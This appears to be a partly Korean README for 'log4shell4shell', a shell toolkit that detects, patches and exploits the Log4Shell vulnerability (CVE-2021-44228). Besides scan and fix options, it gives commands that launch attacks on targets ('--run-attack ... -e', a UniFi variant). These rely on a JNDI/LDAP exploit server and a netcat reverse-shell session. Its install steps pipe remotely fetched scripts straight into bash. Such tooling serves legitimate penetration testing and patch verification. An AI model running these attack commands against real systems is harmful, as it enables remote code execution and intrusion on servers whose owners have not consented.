
Log4shell - 멀티 툴킷. 잠재적인 CVE-2021-44228 취약점을 찾고, 수정하고, 테스트합니다 - 셸에서 완전한 LOG4SHELL 테스트/공격 환경을 제공합니다
Log4j - 멀티툴. 잠재적 CVE-2021-44228 취약점을 찾아 & 수정 - 완전한 LOG4SHELL 테스트/공격 환경을 제공합니다

apt update ; apt install default-jre screen python3-pip bash curlzypper ref ; zypper in default-jre screen python3-pip bash curlyum clean; yum install default-jre screen python3-pip bash curlpkg install default-jre screen python3-pip curl/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pipwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
Exploit-Server 셸에서 일부 공격 정보를 보려면 screen -r l4s4s-ldap-srv 및/또는 screen -r l4s4s-nc-rsh 를 실행하세요:
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
_| _| _| _| _| _| _| _| _| _| _|
_| _|_| _|_|_| _| _| _|_|_| _|_|_| _|_| _| _| _| _| _|_|_| _|_|_| _|_| _| _|
_| _| _| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _|
_| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_| _| _| _| _| _|
_|_|_|_| _|_| _|_|_| _| _|_|_| _| _| _|_|_| _| _| _| _|_|_| _| _| _|_|_| _| _|
_|
_|_|
> Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm
Wrong input! Please enter one of these options:
Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
--get-powershell-finder
--check-system
--fix-log4j
--run-dummy-server <JNDIExploit.*.zip>
--run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
--python-scan <command>
내 헬퍼 스크립트(--list-versions)를 실행하세요: ./python-upgrader.sh
Powershell(관리자 모드)에서 실행하세요: .\set_windows_fix.ps1
log4shell4shell 프로젝트는 교육적 및 윤리적 테스트 목적으로만 제작되었습니다. 사전 상호 동의 없이 대상을 공격하기 위해 log4j-scan을 사용하는 것은 불법입니다. 최종 사용자는 해당 지역, 주 및 연방 법률을 모두 준수할 책임이 있습니다. 개발자는 어떠한 책임도 지지 않으며 이 프로그램으로 인한 오용이나 피해에 대해 책임을 지지 않습니다.